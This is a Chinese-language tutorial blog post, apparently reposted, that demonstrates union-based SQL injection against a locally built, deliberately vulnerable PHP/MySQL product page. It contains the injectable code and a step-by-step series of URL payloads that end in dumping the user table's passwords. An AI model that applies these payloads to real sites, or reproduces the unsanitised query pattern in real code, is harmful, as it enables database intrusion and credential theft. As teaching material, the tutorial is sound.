一個PHP的SQL註入完整過程

来源:https://www.cnblogs.com/a609251438/archive/2020/01/07/12163758.html
-Advertisement-
Play Games

本篇文章介紹的內容是一個PHP的SQL註入完整過程,現在分享給大家,有需要的朋友可以參考一下 希望幫助到大家,很多PHPer在進階的時候總會遇到一些問題和瓶頸,業務代碼寫多了沒有方向感,不知道該從那裡入手去提升,對此我整理了一些資料,包括但不限於:分散式架構、高可擴展、高性能、高併發、伺服器性能調優 ...


本篇文章介紹的內容是一個PHP的SQL註入完整過程,現在分享給大家,有需要的朋友可以參考一下

希望幫助到大家,很多PHPer在進階的時候總會遇到一些問題和瓶頸,業務代碼寫多了沒有方向感,不知道該從那裡入手去提升,對此我整理了一些資料,包括但不限於:分散式架構、高可擴展、高性能、高併發、伺服器性能調優、TP6,laravel,YII2,Redis,Swoole、Swoft、Kafka、Mysql優化、shell腳本、Docker、微服務、Nginx等多個知識點高級進階乾貨需要的可以免費分享給大家,需要的可以加入我的官方群點擊此處

學了SQL註入的一些技能後,以下正對PHP+MYSQL進行SQL註入的簡單實踐

首先觀察兩個MYSQL數據表

用戶記錄表:

REATE TABLE `php_user` (

`id` int(11) NOT NULL auto_increment,

`username` varchar(20) NOT NULL default '',

`password` varchar(20) NOT NULL default '',

`userlevel` char(2) NOT NULL default '0',

PRIMARY KEY (`id`)

) TYPE=MyISAM AUTO_INCREMENT=3 ;

INSERT INTO `php_user` VALUES (1, 'seven', 'seven_pwd', '10');

INSERT INTO `php_user` VALUES (2, 'swons', 'swons_pwd', '');

產品記錄列表:

CREATE TABLE `php_product` (

`id` int(11) NOT NULL auto_increment,

`name` varchar(100) NOT NULL default '',

`price` float NOT NULL default '0',

`img` varchar(200) NOT NULL default '',

PRIMARY KEY (`id`)

) TYPE=MyISAM AUTO_INCREMENT=3 ;

INSERT INTO `php_product` VALUES (1, 'name_1', 12.2, 'images/name_1.jpg');

INSERT INTO `php_product` VALUES (2, 'name_2', 35.25, 'images/name_2.jpg');

 

以下文件是show_product.php用於顯示產品列表。SQL註入也是利用此文件的SQL語句漏洞

<?php

$conn = mysql_connect("localhost", "root", "root");

if(!$conn){

echo "資料庫聯接錯誤";

exit;

}

if (!mysql_select_db("phpsql")) {

echo "選擇資料庫出錯" . mysql_error();

exit;

}

$tempID=$_GET['id'];

if($tempID<=0 || !isset($tempID)) $tempID=1;

$sql = "SELECT * FROM php_product WHERE id =$tempID";

echo $sql.'<br>';

$result = mysql_query($sql);

if (!$result) {

echo "查詢出錯" . mysql_error();

exit;

}

if (mysql_num_rows($result) == 0) {

echo "沒有查詢結果";

exit;

}

while ($row = mysql_fetch_assoc($result)) {

echo 'ID:'.$row["id"].'<br>';

echo 'name:'.$row["name"].'<br>';

echo 'price:'.$row["price"].'<br>';

echo 'image:'.$row["img"].'<br>';

}

?>

觀察此語句:$sql = "SELECT * FROM php_product WHERE id =$tempID";

$tempID是從$_GET得到。我們可以構造這個變數的值,從而達到SQL註入的目的

分別構造以下鏈接:

1、 http://localhost/phpsql/index.php?id=1

得到以下輸出

SELECT * FROM php_product WHERE id =1 //當前執行的SQL語句

//得到ID為1的產品資料列表

ID:1

name:name_1

price:12.2

image:images/name_1.jpg

2、 http://localhost/phpsql/index.php?id=1 or 1=1

得到輸出

SELECT * FROM php_product WHERE id =1 or 1=1 //當前執行的SQL語句

//一共兩條產品資料列表

ID:1

name:name_1

price:12.2

image:images/name_1.jpg

ID:2

name:name_2

price:35.25

image:images/name_2.jpg

1和2都得到資料列表輸出,證明SQL語句執行成功

3、判斷數據表欄位數量

http://localhost/phpsql/index.php?id=1 union select 1,1,1,1

得到輸出

SELECT * FROM php_product WHERE id =1 union select 1,1,1,1 //當前執行的SQL語句

//一共兩條記錄,註意第二條的記錄為全1,這是union select聯合查詢的結果。

ID:1

name:name_1

price:12.2

image:images/name_1.jpg

ID:1

name:1

price:1

image:1

4、判斷數據表欄位類型

http://localhost/phpsql/index.php?id=1 union select char(65),char(65),char(65),char(65)

得到輸出

SELECT * FROM php_product WHERE id =1 union select char(65),char(65),char(65),char(65)

ID:1

name:name_1

price:12.2

image:images/name_1.jpg

ID:0

name:A

price:0

image:A

註意第二條記錄,如果後面的值等於A,說明這個欄位與union查詢後面構造的欄位類型相符。此時union後面

為char(65),表示字元串類型。經過觀察。可以發現name欄位和image欄位的類型都是字元串類型

5、大功告成,得到我們想要的東西:

http://localhost/phpsql/index.php?id=10000 union select 1,username,1,password from php_user

得到輸出:

SELECT * FROM php_product WHERE id =10000 union select 1,username,1,password from php_user

//輸出了兩條用戶資料,name為用戶名稱,image為用戶密碼。

ID:1

name:seven

price:1

image:seven_pwd

ID:1

name:swons

price:1

image:swons_pwd

註意URL中的ID=10000是為了不得到產品資料,只得到後面union的查詢結果。更具實際情況ID的值有所不同

union的username和password必須放在2和4的位置上。這樣才能和前面的select語句匹配。這是union查詢

語句的特點

備註:

這個簡單的註入方法是更具特定環境的。實際中比這複雜。但是原理是相同的。

以上內容希望幫助到大家,很多PHPer在進階的時候總會遇到一些問題和瓶頸,業務代碼寫多了沒有方向感,不知道該從那裡入手去提升,對此我整理了一些資料,包括但不限於:分散式架構、高可擴展、高性能、高併發、伺服器性能調優、TP6,laravel,YII2,Redis,Swoole、Swoft、Kafka、Mysql優化、shell腳本、Docker、微服務、Nginx等多個知識點高級進階乾貨需要的可以免費分享給大家,需要的可以加入我的官方群點擊此處


您的分享是我們最大的動力!

-Advertisement-
Play Games
更多相關文章
  • 一、為什麼會使用比較 在Java中經常會涉及到對象數組的排序問題,那麼就涉及到對象之間的比較問題, 說明:Java中的對象,正常情況下,只能進行比較:== 或 != 。不能使用 > 或 < 的 但是在開發場景中,我們需要對多個對象進行排序,言外之意,就需要比較對象的大小。 如何實現?使用兩個介面中的 ...
  • 寫在前面 在當今信息爆炸的時代,單台電腦已經無法負載日益增長的業務發展,雖然也有性能強大的超級電腦,但是這種高端機不僅費用高昂,也不靈活,一般的企業是負擔不起的,而且也損失不起,那麼將一群廉價的普通電腦組合起來,讓它們協同工作就像一臺超級電腦一樣地對外提供服務,就成了順其自然的設想,但是這又 ...
  • 開發環境: Windows操作系統開發工具:MyEclipse/Eclipse + JDK+ Tomcat + MySQL 資料庫百貨中心供應鏈管理系統主要用於實現了企業管理數據統計等。本系統結構如下:(1)管理界面: 登錄模塊:實現管理員登錄功能; 合作公司管理模塊:實現合作公司信息的增加、修改、 ...
  • ArrayList是動態數組,其實本質就是對數組的操作。那麼LinkedList實現原理和ArrayList是完全不一樣的。現在就來分析一下ArrayList和LinkeList的優劣吧LinkedList是一個雙向鏈表,每個元素都是一個Node對象,這個node對象裡面有三個成員: E item; ...
  • 屬性property 1. 私有屬性添加getter和setter方法 2. 使用property升級getter和setter方法 運行結果: 3. 使用property取代getter和setter方法 @property成為屬性函數,可以對屬性賦值時做必要的檢查,並保證代碼的清晰短小,主要有2 ...
  • 模塊進階 Python有一套很有用的標準庫(standard library)。標準庫會隨著Python解釋器,一起安裝在你的電腦中的。 它是Python的一個組成部分。這些標準庫是Python為你準備好的利器,可以讓編程事半功倍。 用標準庫 hashlib 應用實例 用於註冊、登錄.... 運行結 ...
  • 1. 類也是對象 在大多數編程語言中,類就是一組用來描述如何生成一個對象的代碼段。在Python中這一點仍然成立: 但是,Python中的類還遠不止如此。類同樣也是一種對象。是的,沒錯,就是對象。只要你使用關鍵字class,Python解釋器在執行的時候就會創建一個對象。 下麵的代碼段: 將在記憶體中 ...
  • 明確需求 在使用 的時候,鑒權失敗一般都是返回一個錯誤頁或者登錄頁給前端,特別是後臺系統,這種模式用的特別多。但是現在的項目越來越多的趨向於使用前後端分離的方式開發,這時候就需要響應 數據給前端了,前端再根據狀態碼做相應的操作。那麼Shiro框架能不能在鑒權失敗的時候直接返回 數據呢?答案當然是可以 ...
一周排行
    -Advertisement-
    Play Games
  • 移動開發(一):使用.NET MAUI開發第一個安卓APP 對於工作多年的C#程式員來說,近來想嘗試開發一款安卓APP,考慮了很久最終選擇使用.NET MAUI這個微軟官方的框架來嘗試體驗開發安卓APP,畢竟是使用Visual Studio開發工具,使用起來也比較的順手,結合微軟官方的教程進行了安卓 ...
  • 前言 QuestPDF 是一個開源 .NET 庫,用於生成 PDF 文檔。使用了C# Fluent API方式可簡化開發、減少錯誤並提高工作效率。利用它可以輕鬆生成 PDF 報告、發票、導出文件等。 項目介紹 QuestPDF 是一個革命性的開源 .NET 庫,它徹底改變了我們生成 PDF 文檔的方 ...
  • 項目地址 項目後端地址: https://github.com/ZyPLJ/ZYTteeHole 項目前端頁面地址: ZyPLJ/TreeHoleVue (github.com) https://github.com/ZyPLJ/TreeHoleVue 目前項目測試訪問地址: http://tree ...
  • 話不多說,直接開乾 一.下載 1.官方鏈接下載: https://www.microsoft.com/zh-cn/sql-server/sql-server-downloads 2.在下載目錄中找到下麵這個小的安裝包 SQL2022-SSEI-Dev.exe,運行開始下載SQL server; 二. ...
  • 前言 隨著物聯網(IoT)技術的迅猛發展,MQTT(消息隊列遙測傳輸)協議憑藉其輕量級和高效性,已成為眾多物聯網應用的首選通信標準。 MQTTnet 作為一個高性能的 .NET 開源庫,為 .NET 平臺上的 MQTT 客戶端與伺服器開發提供了強大的支持。 本文將全面介紹 MQTTnet 的核心功能 ...
  • Serilog支持多種接收器用於日誌存儲,增強器用於添加屬性,LogContext管理動態屬性,支持多種輸出格式包括純文本、JSON及ExpressionTemplate。還提供了自定義格式化選項,適用於不同需求。 ...
  • 目錄簡介獲取 HTML 文檔解析 HTML 文檔測試參考文章 簡介 動態內容網站使用 JavaScript 腳本動態檢索和渲染數據,爬取信息時需要模擬瀏覽器行為,否則獲取到的源碼基本是空的。 本文使用的爬取步驟如下: 使用 Selenium 獲取渲染後的 HTML 文檔 使用 HtmlAgility ...
  • 1.前言 什麼是熱更新 游戲或者軟體更新時,無需重新下載客戶端進行安裝,而是在應用程式啟動的情況下,在內部進行資源或者代碼更新 Unity目前常用熱更新解決方案 HybridCLR,Xlua,ILRuntime等 Unity目前常用資源管理解決方案 AssetBundles,Addressable, ...
  • 本文章主要是在C# ASP.NET Core Web API框架實現向手機發送驗證碼簡訊功能。這裡我選擇是一個互億無線簡訊驗證碼平臺,其實像阿裡雲,騰訊雲上面也可以。 首先我們先去 互億無線 https://www.ihuyi.com/api/sms.html 去註冊一個賬號 註冊完成賬號後,它會送 ...
  • 通過以下方式可以高效,並保證數據同步的可靠性 1.API設計 使用RESTful設計,確保API端點明確,並使用適當的HTTP方法(如POST用於創建,PUT用於更新)。 設計清晰的請求和響應模型,以確保客戶端能夠理解預期格式。 2.數據驗證 在伺服器端進行嚴格的數據驗證,確保接收到的數據符合預期格 ...